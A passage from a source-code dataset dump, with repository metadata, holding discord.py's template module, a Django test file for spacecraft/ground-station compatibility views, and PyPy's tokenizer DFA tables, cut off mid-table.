] | 2 | 2020-11-19T09:41:26.000Z | 2021-12-07T12:08:55.000Z | discord/template.py | jonasbohmann/discord.py | a63ced9c6910b92acc06e6c0d9f50f1ce495b18b | [
"MIT"
] | null | null | null | discord/template.py | jonasbohmann/discord.py | a63ced9c6910b92acc06e6c0d9f50f1ce495b18b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from .utils import parse_time, _get_as_snowflake, _bytes_to_base64_data
from .enums import VoiceRegion
from .guild import Guild
__all__ = (
'Template',
)
class _FriendlyHttpAttributeErrorHelper:
__slots__ = ()
def __getattr__(self, attr):
raise AttributeError('PartialTemplateState does not support http methods.')
class _PartialTemplateState:
def __init__(self, *, state):
self.__state = state
self.http = _FriendlyHttpAttributeErrorHelper()
@property
def is_bot(self):
return self.__state.is_bot
@property
def shard_count(self):
return self.__state.shard_count
@property
def user(self):
return self.__state.user
@property
def self_id(self):
return self.__state.user.id
@property
def member_cache_flags(self):
return self.__state.member_cache_flags
def store_emoji(self, guild, packet):
return None
def _get_voice_client(self, id):
return None
def _get_message(self, id):
return None
async def query_members(self, **kwargs):
return []
def __getattr__(self, attr):
raise AttributeError('PartialTemplateState does not support {0!r}.'.format(attr))
class Template:
"""Represents a Discord template.
.. versionadded:: 1.4
Attributes
-----------
code: :class:`str`
The template code.
uses: :class:`int`
How many times the template has been used.
name: :class:`str`
The name of the template.
description: :class:`str`
The description of the template.
creator: :class:`User`
The creator of the template.
created_at: :class:`datetime.datetime`
When the template was created.
updated_at: :class:`datetime.datetime`
When the template was last updated (referred to as "last synced" in the client).
source_guild: :class:`Guild`
The source guild.
"""
def __init__(self, *, state, data):
self._state = state
self.code = data['code']
self.uses = data['usage_count']
self.name = data['name']
self.description = data['description']
creator_data = data.get('creator')
self.creator = None if creator_data is None else self._state.store_user(creator_data)
self.created_at = parse_time(data.get('created_at'))
self.updated_at = parse_time(data.get('updated_at'))
id = _get_as_snowflake(data, 'source_guild_id')
source_serialised = data['serialized_source_guild']
source_serialised['id'] = id
state = _PartialTemplateState(state=self._state)
self.source_guild = Guild(data=source_serialised, state=state)
def __repr__(self):
return '<Template code={0.code!r} uses={0.uses} name={0.name!r}' \
' creator={0.creator!r} source_guild={0.source_guild!r}>'.format(self)
async def create_guild(self, name, region=None, icon=None):
"""|coro|
Creates a :class:`.Guild` using the template.
Bot accounts in more than 10 guilds are not allowed to create guilds.
Parameters
----------
name: :class:`str`
The name of the guild.
region: :class:`.VoiceRegion`
The region for the voice communication server.
Defaults to :attr:`.VoiceRegion.us_west`.
icon: :class:`bytes`
The :term:`py:bytes-like object` representing the icon. See :meth:`.ClientUser.edit`
for more details on what is expected.
Raises
------
:exc:`.HTTPException`
Guild creation failed.
:exc:`.InvalidArgument`
Invalid icon image format given. Must be PNG or JPG.
Returns
-------
:class:`.Guild`
The guild created. This is not the same guild that is
added to cache.
"""
if icon is not None:
icon = _bytes_to_base64_data(icon)
if region is None:
region = VoiceRegion.us_west.value
else:
region = region.value
data = await self._state.http.create_from_template(self.code, name, region, icon)
return Guild(data=data, state=self._state)
| 31.356725 | 96 | 0.657404 |
from .utils import parse_time, _get_as_snowflake, _bytes_to_base64_data
from .enums import VoiceRegion
from .guild import Guild
__all__ = (
'Template',
)
class _FriendlyHttpAttributeErrorHelper:
__slots__ = ()
def __getattr__(self, attr):
raise AttributeError('PartialTemplateState does not support http methods.')
class _PartialTemplateState:
def __init__(self, *, state):
self.__state = state
self.http = _FriendlyHttpAttributeErrorHelper()
@property
def is_bot(self):
return self.__state.is_bot
@property
def shard_count(self):
return self.__state.shard_count
@property
def user(self):
return self.__state.user
@property
def self_id(self):
return self.__state.user.id
@property
def member_cache_flags(self):
return self.__state.member_cache_flags
def store_emoji(self, guild, packet):
return None
def _get_voice_client(self, id):
return None
def _get_message(self, id):
return None
async def query_members(self, **kwargs):
return []
def __getattr__(self, attr):
raise AttributeError('PartialTemplateState does not support {0!r}.'.format(attr))
class Template:
def __init__(self, *, state, data):
self._state = state
self.code = data['code']
self.uses = data['usage_count']
self.name = data['name']
self.description = data['description']
creator_data = data.get('creator')
self.creator = None if creator_data is None else self._state.store_user(creator_data)
self.created_at = parse_time(data.get('created_at'))
self.updated_at = parse_time(data.get('updated_at'))
id = _get_as_snowflake(data, 'source_guild_id')
source_serialised = data['serialized_source_guild']
source_serialised['id'] = id
state = _PartialTemplateState(state=self._state)
self.source_guild = Guild(data=source_serialised, state=state)
def __repr__(self):
return '<Template code={0.code!r} uses={0.uses} name={0.name!r}' \
' creator={0.creator!r} source_guild={0.source_guild!r}>'.format(self)
async def create_guild(self, name, region=None, icon=None):
if icon is not None:
icon = _bytes_to_base64_data(icon)
if region is None:
region = VoiceRegion.us_west.value
else:
region = region.value
data = await self._state.http.create_from_template(self.code, name, region, icon)
return Guild(data=data, state=self._state)
| true | true |
1c333452ebe6f0e0869a6644f68e01a17c05280f | 3,226 | py | Python | services/scheduling/tests/jrpc/test_compatibility.py | rtubio/server | 3bb15f4d4dcd543d6f95d1fda2cb737de0bb9a9b | [
"Apache-2.0"
] | 4 | 2015-03-23T16:34:53.000Z | 2017-12-12T11:41:54.000Z | services/scheduling/tests/jrpc/test_compatibility.py | rtubio/server | 3bb15f4d4dcd543d6f95d1fda2cb737de0bb9a9b | [
"Apache-2.0"
] | 42 | 2015-01-08T22:21:04.000Z | 2021-12-13T19:48:44.000Z | services/scheduling/tests/jrpc/test_compatibility.py | rtubio/server | 3bb15f4d4dcd543d6f95d1fda2cb737de0bb9a9b | [
"Apache-2.0"
] | 2 | 2015-04-04T15:23:35.000Z | 2017-07-23T23:14:06.000Z |
import logging
from django import test
from services.common import helpers as db_tools
from services.scheduling.jrpc.views import compatibility as compatibility_jrpc
"""
Copyright 2015 Ricardo Tubio-Pardavila
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__author__ = 'rtubiopa@calpoly.edu'
class TestCompatibilityViews(test.TestCase):
"""
Tests for the compatibility JRPC views
"""
def setUp(self):
"""
Populates the initial database with a set of objects required to run
the following tests.
"""
self.__verbose_testing = False
if not self.__verbose_testing:
logging.getLogger('configuration').setLevel(level=logging.CRITICAL)
# noinspection PyUnresolvedReferences
from services.scheduling.signals import compatibility
self.__gs_1_id = 'gs-castrelos'
self.__gs_1_ch_1_id = 'chan-cas-1'
self.__gs_1_ch_2_id = 'chan-cas-2'
self.__band = db_tools.create_band()
self.__user_profile = db_tools.create_user_profile()
self.__gs_1 = db_tools.create_gs(
user_profile=self.__user_profile, identifier=self.__gs_1_id,
)
self.__gs_1_ch_1 = db_tools.gs_add_channel(
self.__gs_1, self.__band, self.__gs_1_ch_1_id
)
self.__gs_1_ch_2 = db_tools.gs_add_channel(
self.__gs_1, self.__band, self.__gs_1_ch_2_id
)
self.__sc_1_id = 'humd'
self.__sc_1_ch_1_id = 'gmsk-sc-1'
self.__sc_1_ch_1_f = 437000000
self.__sc_1_ch_2_id = 'gmsk-sc-2'
self.__sc_1 = db_tools.create_sc(
user_profile=self.__user_profile,
identifier=self.__sc_1_id
)
self.__sc_1_ch_1 = db_tools.sc_add_channel(
self.__sc_1, self.__sc_1_ch_1_f, self.__sc_1_ch_1_id,
)
def test_sc_channel_get_compatible(self):
"""JRPC test: configuration.sc.channel.getCompatible
"""
if self.__verbose_testing:
print('>>> TEST (test_sc_channel_get_compatible)')
c = compatibility_jrpc.sc_channel_get_compatible(
self.__sc_1_id, self.__sc_1_ch_1_id
)
self.assertEquals(c[0]['GroundStation']['identifier'], self.__gs_1_id)
def test_sc_get_compatible(self):
"""JRPC test: configuration.sc.getCompatible
"""
if self.__verbose_testing:
print('>>> TEST (test_sc_get_compatible)')
r = compatibility_jrpc.sc_get_compatible(self.__sc_1_id)
self.assertEquals(
r['spacecraft_id'], self.__sc_1_id
)
self.assertEquals(
r['Compatibility'][0]['ScChannel']['identifier'], 'gmsk-sc-1',
)
| 32.26 | 79 | 0.66491 |
import logging
from django import test
from services.common import helpers as db_tools
from services.scheduling.jrpc.views import compatibility as compatibility_jrpc
__author__ = 'rtubiopa@calpoly.edu'
class TestCompatibilityViews(test.TestCase):
def setUp(self):
self.__verbose_testing = False
if not self.__verbose_testing:
logging.getLogger('configuration').setLevel(level=logging.CRITICAL)
from services.scheduling.signals import compatibility
self.__gs_1_id = 'gs-castrelos'
self.__gs_1_ch_1_id = 'chan-cas-1'
self.__gs_1_ch_2_id = 'chan-cas-2'
self.__band = db_tools.create_band()
self.__user_profile = db_tools.create_user_profile()
self.__gs_1 = db_tools.create_gs(
user_profile=self.__user_profile, identifier=self.__gs_1_id,
)
self.__gs_1_ch_1 = db_tools.gs_add_channel(
self.__gs_1, self.__band, self.__gs_1_ch_1_id
)
self.__gs_1_ch_2 = db_tools.gs_add_channel(
self.__gs_1, self.__band, self.__gs_1_ch_2_id
)
self.__sc_1_id = 'humd'
self.__sc_1_ch_1_id = 'gmsk-sc-1'
self.__sc_1_ch_1_f = 437000000
self.__sc_1_ch_2_id = 'gmsk-sc-2'
self.__sc_1 = db_tools.create_sc(
user_profile=self.__user_profile,
identifier=self.__sc_1_id
)
self.__sc_1_ch_1 = db_tools.sc_add_channel(
self.__sc_1, self.__sc_1_ch_1_f, self.__sc_1_ch_1_id,
)
def test_sc_channel_get_compatible(self):
if self.__verbose_testing:
print('>>> TEST (test_sc_channel_get_compatible)')
c = compatibility_jrpc.sc_channel_get_compatible(
self.__sc_1_id, self.__sc_1_ch_1_id
)
self.assertEquals(c[0]['GroundStation']['identifier'], self.__gs_1_id)
def test_sc_get_compatible(self):
if self.__verbose_testing:
print('>>> TEST (test_sc_get_compatible)')
r = compatibility_jrpc.sc_get_compatible(self.__sc_1_id)
self.assertEquals(
r['spacecraft_id'], self.__sc_1_id
)
self.assertEquals(
r['Compatibility'][0]['ScChannel']['identifier'], 'gmsk-sc-1',
)
| true | true |
1c33358672906e92d07484e42457ecde63e16919 | 11,221 | py | Python | pypy/interpreter/pyparser/pytokenize.py | m4sterchain/mesapy | ed546d59a21b36feb93e2309d5c6b75aa0ad95c9 | [
"Apache-2.0",
"OpenSSL"
] | 381 | 2018-08-18T03:37:22.000Z | 2022-02-06T23:57:36.000Z | pypy/interpreter/pyparser/pytokenize.py | m4sterchain/mesapy | ed546d59a21b36feb93e2309d5c6b75aa0ad95c9 | [
"Apache-2.0",
"OpenSSL"
] | 16 | 2018-09-22T18:12:47.000Z | 2022-02-22T20:03:59.000Z | pypy/interpreter/pyparser/pytokenize.py | m4sterchain/mesapy | ed546d59a21b36feb93e2309d5c6b75aa0ad95c9 | [
"Apache-2.0",
"OpenSSL"
] | 30 | 2018-08-20T03:16:34.000Z | 2022-01-12T17:39:22.000Z | # ______________________________________________________________________
"""Module pytokenize
THIS FILE WAS COPIED FROM pypy/module/parser/pytokenize.py AND ADAPTED
TO BE ANNOTABLE (Mainly made lists homogeneous)
This is a modified version of Ka-Ping Yee's tokenize module found in the
Python standard library.
The primary modification is the removal of the tokenizer's dependence on the
standard Python regular expression module, which is written in C. The regular
expressions have been replaced with hand built DFA's using the
basil.util.automata module.
$Id: pytokenize.py,v 1.3 2003/10/03 16:31:53 jriehl Exp $
"""
# ______________________________________________________________________
from pypy.interpreter.pyparser import automata
__all__ = [ "tokenize" ]
# ______________________________________________________________________
# Automatically generated DFA's
accepts = [True, True, True, True, True, True, True, True,
True, True, False, True, True, True, True, False,
False, False, True, False, False, True, False,
False, True, False, True, False, True, False,
False, True, False, False, True, True, True,
False, False, True, False, False, False, True]
states = [
# 0
{'\t': 0, '\n': 13, '\x0c': 0,
'\r': 14, ' ': 0, '!': 10, '"': 16,
'#': 18, '%': 12, '&': 12, "'": 15,
'(': 13, ')': 13, '*': 7, '+': 12,
',': 13, '-': 12, '.': 6, '/': 11,
'0': 4, '1': 5, '2': 5, '3': 5,
'4': 5, '5': 5, '6': 5, '7': 5,
'8': 5, '9': 5, ':': 13, ';': 13,
'<': 9, '=': 12, '>': 8, '@': 13,
'A': 1, 'B': 2, 'C': 1, 'D': 1,
'E': 1, 'F': 1, 'G': 1, 'H': 1,
'I': 1, 'J': 1, 'K': 1, 'L': 1,
'M': 1, 'N': 1, 'O': 1, 'P': 1,
'Q': 1, 'R': 3, 'S': 1, 'T': 1,
'U': 2, 'V': 1, 'W': 1, 'X': 1,
'Y': 1, 'Z': 1, '[': 13, '\\': 17,
']': 13, '^': 12, '_': 1, '`': 13,
'a': 1, 'b': 2, 'c': 1, 'd': 1,
'e': 1, 'f': 1, 'g': 1, 'h': 1,
'i': 1, 'j': 1, 'k': 1, 'l': 1,
'm': 1, 'n': 1, 'o': 1, 'p': 1,
'q': 1, 'r': 3, 's': 1, 't': 1,
'u': 2, 'v': 1, 'w': 1, 'x': 1,
'y': 1, 'z': 1, '{': 13, '|': 12,
'}': 13, '~': 13},
# 1
{'0': 1, '1': 1, '2': 1, '3': 1,
'4': 1, '5': 1, '6': 1, '7': 1,
'8': 1, '9': 1, 'A': 1, 'B': 1,
'C': 1, 'D': 1, 'E': 1, 'F': 1,
'G': 1, 'H': 1, 'I': 1, 'J': 1,
'K': 1, 'L': 1, 'M': 1, 'N': 1,
'O': 1, 'P': 1, 'Q': 1, 'R': 1,
'S': 1, 'T': 1, 'U': 1, 'V': 1,
'W': 1, 'X': 1, 'Y': 1, 'Z': 1,
'_': 1, 'a': 1, 'b': 1, 'c': 1,
'd': 1, 'e': 1, 'f': 1, 'g': 1,
'h': 1, 'i': 1, 'j': 1, 'k': 1,
'l': 1, 'm': 1, 'n': 1, 'o': 1,
'p': 1, 'q': 1, 'r': 1, 's': 1,
't': 1, 'u': 1, 'v': 1, 'w': 1,
'x': 1, 'y': 1, 'z': 1},
# 2
{'"': 16, "'": 15, '0': 1, '1': 1,
'2': 1, '3': 1, '4': 1, '5': 1,
'6': 1, '7': 1, '8': 1, '9': 1,
'A': 1, 'B': 1, 'C': 1, 'D': 1,
'E': 1, 'F': 1, 'G': 1, 'H': 1,
'I': 1, 'J': 1, 'K': 1, 'L': 1,
'M': 1, 'N': 1, 'O': 1, 'P': 1,
'Q': 1, 'R': 3, 'S': 1, 'T': 1,
'U': 1, 'V': 1, 'W': 1, 'X': 1,
'Y': 1, 'Z': 1, '_': 1, 'a': 1,
'b': 1, 'c': 1, 'd': 1, 'e': 1,
'f': 1, 'g': 1, 'h': 1, 'i': 1,
'j': 1, 'k': 1, 'l': 1, 'm': 1,
'n': 1, 'o': 1, 'p': 1, 'q': 1,
'r': 3, 's': 1, 't': 1, 'u': 1,
'v': 1, 'w': 1, 'x': 1, 'y': 1,
'z': 1},
# 3
{'"': 16, "'": 15, '0': 1, '1': 1,
'2': 1, '3': 1, '4': 1, '5': 1,
'6': 1, '7': 1, '8': 1, '9': 1,
'A': 1, 'B': 1, 'C': 1, 'D': 1,
'E': 1, 'F': 1, 'G': 1, 'H': 1,
'I': 1, 'J': 1, 'K': 1, 'L': 1,
'M': 1, 'N': 1, 'O': 1, 'P': 1,
'Q': 1, 'R': 1, 'S': 1, 'T': 1,
'U': 1, 'V': 1, 'W': 1, 'X': 1,
'Y': 1, 'Z': 1, '_': 1, 'a': 1,
'b': 1, 'c': 1, 'd': 1, 'e': 1,
'f': 1, 'g': 1, 'h': 1, 'i': 1,
'j': 1, 'k': 1, 'l': 1, 'm': 1,
'n': 1, 'o': 1, 'p': 1, 'q': 1,
'r': 1, 's': 1, 't': 1, 'u': 1,
'v': 1, 'w': 1, 'x': 1, 'y': 1,
'z': 1},
# 4
{'.': 24, '0': 21, '1': 21, '2': 21,
'3': 21, '4': 21, '5': 21, '6': 21,
'7': 21, '8': 23, '9': 23, 'B': 22,
'E': 25, 'J': 13, 'L': 13, 'O': 20,
'X': 19, 'b': 22, 'e': 25, 'j': 13,
'l': 13, 'o': 20, 'x': 19},
# 5
{'.': 24, '0': 5, '1': 5, '2': 5,
'3': 5, '4': 5, '5': 5, '6': 5,
'7': 5, '8': 5, '9': 5, 'E': 25,
'J': 13, 'L': 13, 'e': 25, 'j': 13,
'l': 13},
# 6
{'0': 26, '1': 26, '2': 26, '3': 26,
'4': 26, '5': 26, '6': 26, '7': 26,
'8': 26, '9': 26},
# 7
{'*': 12, '=': 13},
# 8
{'=': 13, '>': 12},
# 9
{'<': 12, '=': 13, '>': 13},
# 10
{'=': 13},
# 11
{'/': 12, '=': 13},
# 12
{'=': 13},
# 13
{},
# 14
{'\n': 13},
# 15
{automata.DEFAULT: 30, '\n': 27,
'\r': 27, "'": 28, '\\': 29},
# 16
{automata.DEFAULT: 33, '\n': 27,
'\r': 27, '"': 31, '\\': 32},
# 17
{'\n': 13, '\r': 14},
# 18
{automata.DEFAULT: 18, '\n': 27, '\r': 27},
# 19
{'0': 34, '1': 34, '2': 34, '3': 34,
'4': 34, '5': 34, '6': 34, '7': 34,
'8': 34, '9': 34, 'A': 34, 'B': 34,
'C': 34, 'D': 34, 'E': 34, 'F': 34,
'a': 34, 'b': 34, 'c': 34, 'd': 34,
'e': 34, 'f': 34},
# 20
{'0': 35, '1': 35, '2': 35, '3': 35,
'4': 35, '5': 35, '6': 35, '7': 35},
# 21
{'.': 24, '0': 21, '1': 21, '2': 21,
'3': 21, '4': 21, '5': 21, '6': 21,
'7': 21, '8': 23, '9': 23, 'E': 25,
'J': 13, 'L': 13, 'e': 25, 'j': 13,
'l': 13},
# 22
{'0': 36, '1': 36},
# 23
{'.': 24, '0': 23, '1': 23, '2': 23,
'3': 23, '4': 23, '5': 23, '6': 23,
'7': 23, '8': 23, '9': 23, 'E': 25,
'J': 13, 'e': 25, 'j': 13},
# 24
{'0': 24, '1': 24, '2': 24, '3': 24,
'4': 24, '5': 24, '6': 24, '7': 24,
'8': 24, '9': 24, 'E': 37, 'J': 13,
'e': 37, 'j': 13},
# 25
{'+': 38, '-': 38, '0': 39, '1': 39,
'2': 39, '3': 39, '4': 39, '5': 39,
'6': 39, '7': 39, '8': 39, '9': 39},
# 26
{'0': 26, '1': 26, '2': 26, '3': 26,
'4': 26, '5': 26, '6': 26, '7': 26,
'8': 26, '9': 26, 'E': 37, 'J': 13,
'e': 37, 'j': 13},
# 27
{},
# 28
{"'": 13},
# 29
{automata.DEFAULT: 40, '\n': 13, '\r': 14},
# 30
{automata.DEFAULT: 30, '\n': 27,
'\r': 27, "'": 13, '\\': 29},
# 31
{'"': 13},
# 32
{automata.DEFAULT: 41, '\n': 13, '\r': 14},
# 33
{automata.DEFAULT: 33, '\n': 27,
'\r': 27, '"': 13, '\\': 32},
# 34
{'0': 34, '1': 34, '2': 34, '3': 34,
'4': 34, '5': 34, '6': 34, '7': 34,
'8': 34, '9': 34, 'A': 34, 'B': 34,
'C': 34, 'D': 34, 'E': 34, 'F': 34,
'L': 13, 'a': 34, 'b': 34, 'c': 34,
'd': 34, 'e': 34, 'f': 34, 'l': 13},
# 35
{'0': 35, '1': 35, '2': 35, '3': 35,
'4': 35, '5': 35, '6': 35, '7': 35,
'L': 13, 'l': 13},
# 36
{'0': 36, '1': 36, 'L': 13, 'l': 13},
# 37
{'+': 42, '-': 42, '0': 43, '1': 43,
'2': 43, '3': 43, '4': 43, '5': 43,
'6': 43, '7': 43, '8': 43, '9': 43},
# 38
{'0': 39, '1': 39, '2': 39, '3': 39,
'4': 39, '5': 39, '6': 39, '7': 39,
'8': 39, '9': 39},
# 39
{'0': 39, '1': 39, '2': 39, '3': 39,
'4': 39, '5': 39, '6': 39, '7': 39,
'8': 39, '9': 39, 'J': 13, 'j': 13},
# 40
{automata.DEFAULT: 40, '\n': 27,
'\r': 27, "'": 13, '\\': 29},
# 41
{automata.DEFAULT: 41, '\n': 27,
'\r': 27, '"': 13, '\\': 32},
# 42
{'0': 43, '1': 43, '2': 43, '3': 43,
'4': 43, '5': 43, '6': 43, '7': 43,
'8': 43, '9': 43},
# 43
{'0': 43, '1': 43, '2': 43, '3': 43,
'4': 43, '5': 43, '6': 43, '7': 43,
'8': 43, '9': 43, 'J': 13, 'j': 13},
]
pseudoDFA = automata.DFA(states, accepts)
accepts = [False, False, False, False, False, True]
states = [
# 0
{automata.DEFAULT: 0, '"': 1, '\\': 2},
# 1
{automata.DEFAULT: 4, '"': 3, '\\': 2},
# 2
{automata.DEFAULT: 4},
# 3
{automata.DEFAULT: 4, '"': 5, '\\': 2},
# 4
{automata.DEFAULT: 4, '"': 1, '\\': 2},
# 5
{automata.DEFAULT: 4, '"': 5, '\\': 2},
]
double3DFA = automata.NonGreedyDFA(states, accepts)
accepts = [False, False, False, False, False, True]
states = [
# 0
{automata.DEFAULT: 0, "'": 1, '\\': 2},
# 1
{automata.DEFAULT: 4, "'": 3, '\\': 2},
# 2
{automata.DEFAULT: 4},
# 3
{automata.DEFAULT: 4, "'": 5, '\\': 2},
# 4
{automata.DEFAULT: 4, "'": 1, '\\': 2},
# 5
{automata.DEFAULT: 4, "'": 5, '\\': 2},
]
single3DFA = automata.NonGreedyDFA(states, accepts)
accepts = [False, True, False, False]
states = [
# 0
{automata.DEFAULT: 0, "'": 1, '\\': 2},
# 1
{},
# 2
{automata.DEFAULT: 3},
# 3
{automata.DEFAULT: 3, "'": 1, '\\': 2},
]
singleDFA = automata.DFA(states, accepts)
accepts = [False, True, False, False]
states = [
# 0
{automata.DEFAULT: 0, '"': 1, '\\': 2},
# 1
{},
# 2
{automata.DEFAULT: 3},
# 3
{automata.DEFAULT: 3, '"': 1, '\\': 2},
]
doubleDFA = automata.DFA(states, accepts)
#_______________________________________________________________________
# End of automatically generated DFA's
endDFAs = {"'" : singleDFA,
'"' : doubleDFA,
'r' : None,
'R' : None,
'u' : None,
'U' : None,
'b' : None,
'B' : None}
for uniPrefix in ("", "u", "U", "b", "B"):
for rawPrefix in ("", "r", "R"):
prefix = uniPrefix + rawPrefix
endDFAs[prefix + "'''"] = single3DFA
endDFAs[prefix + '"""'] = double3DFA
whiteSpaceStatesAccepts = [True]
whiteSpaceStates = [{'\t': 0, ' ': 0, '\x0c': 0}]
whiteSpaceDFA = automata.DFA(whiteSpaceStates, whiteSpaceStatesAccepts)
# ______________________________________________________________________
# COPIED:
triple_quoted = {}
for t in ("'''", '"""',
"r'''", 'r"""', "R'''", 'R"""',
"u'''", 'u"""', "U'''", 'U"""',
"b'''", 'b"""', "B'''", 'B"""',
"ur'''", 'ur"""', "Ur'''", 'Ur"""',
"uR'''", 'uR"""', "UR'''", 'UR"""',
"br'''", 'br"""', "Br'''", 'Br"""',
"bR'''", 'bR"""', "BR'''", 'BR"""'):
triple_quoted[t] = t
single_quoted = {}
for t in ("'", '"',
"r'", 'r"', "R'", 'R"',
"u'", 'u"', "U'", 'U"',
"b'", 'b"', "B'", 'B"',
"ur'", 'ur"', "Ur'", 'Ur"',
"uR'", 'uR"', "UR'", 'UR"',
"br'", 'br"', "Br'", 'Br"',
"bR'", 'bR"', "BR'", 'BR"'):
single_quoted[t] = t
tabsize = 8
# PYPY MODIFICATION: removed TokenError class as it's not needed here
# PYPY MODIFICATION: removed StopTokenizing class as it's not needed here
# PYPY MODIFICATION: removed printtoken() as it's not needed here
# PYPY MODIFICATION: removed tokenize() as it's not needed here
# PYPY MODIFICATION: removed tokenize_loop() as it's not needed here
# PYPY MODIFICATION: removed generate_tokens() as it was copied / modified
# in pythonlexer.py
# PYPY MODIFICATION: removed main() as it's not needed here
# ______________________________________________________________________
# End of pytokenize.py
| 29.843085 | 78 | 0.387131 |
from pypy.interpreter.pyparser import automata
__all__ = [ "tokenize" ]
accepts = [True, True, True, True, True, True, True, True,
True, True, False, True, True, True, True, False,
False, False, True, False, False, True, False,
False, True, False, True, False, True, False,
False, True, False, False, True, True, True,
False, False, True, False, False, False, True]
states = [
# 0
{'\t': 0, '\n': 13, '\x0c': 0,
'\r': 14, ' ': 0, '!': 10, '"': 16,
'#': 18, '%': 12, '&': 12, "'": 15,
'(': 13, ')': 13, '*': 7, '+': 12,
',': 13, '-': 12, '.': 6, '/': 11,
'0': 4, '1': 5, '2': 5, '3': 5,
'4': 5, '5': 5, '6': 5, '7': 5,
'8': 5, '9': 5, ':': 13, ';': 13,
'<': 9, '=': 12, '>': 8, '@': 13,
'A': 1, 'B': 2, 'C': 1, 'D': 1,
'E': 1, 'F': 1, 'G': 1, 'H': 1,
'I': 1, 'J': 1, 'K': 1, 'L': 1,
'M': 1, 'N': 1, 'O': 1, 'P': 1,
'Q': 1, 'R': 3, 'S': 1, 'T': 1,
'U': 2, 'V': 1, 'W': 1, 'X': 1,
'Y': 1, 'Z': 1, '[': 13, '\\': 17,
']': 13, '^': 12, '_': 1, '`': 13,
'a': 1, 'b': 2, 'c': 1, 'd': 1,
'e': 1, 'f': 1, 'g': 1, 'h': 1,
'i': 1, 'j': 1, 'k': 1, 'l': 1,
'm': 1, 'n': 1, 'o': 1, 'p': 1,
'q': 1, 'r': 3, 's': 1, 't': 1,
'u': 2, 'v': 1, 'w': 1, 'x': 1,
'y': 1, 'z': 1, '{': 13, '|': 12,
'}': 13, '~': 13},
# 1
{'0': 1, '1': 1, '2': 1, '3': 1,
'4': 1, '5': 1, '6': 1, '7': 1,
'8': 1, '9': 1, 'A': 1, 'B': 1,
'C': 1, 'D': 1, 'E': 1, 'F': 1,
'G': 1, 'H': 1, 'I': 1, 'J': 1,
'K': 1, 'L': 1, 'M': 1, 'N': 1,
'O': 1, 'P': 1, 'Q': 1, 'R': 1,
'S': 1, 'T': 1, 'U': 1, 'V': 1,
'W': 1, 'X': 1, 'Y': 1, 'Z': 1,
'_': 1, 'a': 1, 'b': 1, 'c': 1,
'd': 1, 'e': 1, 'f': 1, 'g': 1,
'h': 1, 'i': 1, 'j': 1, 'k': 1,
'l': 1, 'm': 1, 'n': 1, 'o': 1,
'p': 1, 'q': 1, 'r': 1, 's': 1,
't': 1, 'u': 1, 'v': 1, 'w': 1,
'x': 1, 'y': 1, 'z': 1},
# 2
{'"': 16, "'": 15, '0': 1, '1': 1,
'2': 1, '3': 1, '4': 1, '5': 1,
'6': 1, '7': 1, '8': 1, '9': 1,
'A': 1, 'B': 1, 'C': 1, 'D': 1,
'E': 1, 'F': 1, 'G': 1, 'H': 1,
'I': 1, 'J': 1, 'K': 1, 'L': 1,
'M': 1, 'N': 1, 'O': 1, 'P': 1,
'Q': 1, 'R': 3, 'S': 1, 'T': 1,
'U': 1, 'V': 1, 'W': 1, 'X': 1,
'Y': 1, 'Z': 1, '_': 1, 'a': 1,
'b': 1, 'c': 1, 'd': 1, 'e': 1,
'f': 1, 'g': 1, 'h': 1, 'i': 1,
'j': 1, 'k': 1, 'l': 1, 'm': 1,
'n': 1, 'o': 1, 'p': 1, 'q': 1,
'r': 3, 's': 1, 't': 1, 'u': 1,
'v': 1, 'w': 1, 'x': 1, 'y': 1,
'z': 1},
# 3
{'"': 16, "'": 15, '0': 1, '1': 1,
'2': 1, '3': 1, '4': 1, '5': 1,
'6': 1, '7': 1, '8': 1, '9': 1,
'A': 1, 'B': 1, 'C': 1, 'D': 1,
'E': 1, 'F': 1, 'G': 1, 'H': 1,
'I': 1, 'J': 1, 'K': 1, 'L': 1,
'M': 1, 'N': 1, 'O': 1, 'P': 1,
'Q': 1, 'R': 1, 'S': 1, 'T': 1,
'U': 1, 'V': 1, 'W': 1, 'X': 1,
'Y': 1, 'Z': 1, '_': 1, 'a': 1,
'b': 1, 'c': 1, 'd': 1, 'e': 1,
'f': 1, 'g': 1, 'h': 1, 'i': 1,
'j': 1, 'k': 1, 'l': 1, 'm': 1,
'n': 1, 'o': 1, 'p': 1, 'q': 1,
'r': 1, 's': 1, 't': 1, 'u': 1,
'v': 1, 'w': 1, 'x': 1, 'y': 1,
'z': 1},
# 4
{'.': 24, '0': 21, '1': 21, '2': 21,
'3': 21, '4': 21, '5': 21, '6': 21,
'7': 21, '8': 23, '9': 23, 'B': 22,
'E': 25, 'J': 13, 'L': 13, 'O': 20,
'X': 19, 'b': 22, 'e': 25, 'j': 13,
'l': 13, 'o': 20, 'x': 19},
# 5
{'.': 24, '0': 5, '1': 5, '2': 5,
'3': 5, '4': 5, '5': 5, '6': 5,
'7': 5, '8': 5, '9': 5, 'E': 25,
'J': 13, 'L': 13, 'e': 25, 'j': 13,
'l': 13},
# 6
{'0': 26, '1': 26, '2': 26, '3': 26,
'4': 26, '5': 26, '6': 26, '7': 26,
'8': 26, '9': 26},
# 7
{'*': 12, '=': 13},
# 8
{'=': 13, '>': 12},
# 9
{'<': 12, '=': 13, '>': 13},
# 10
{'=': 13},
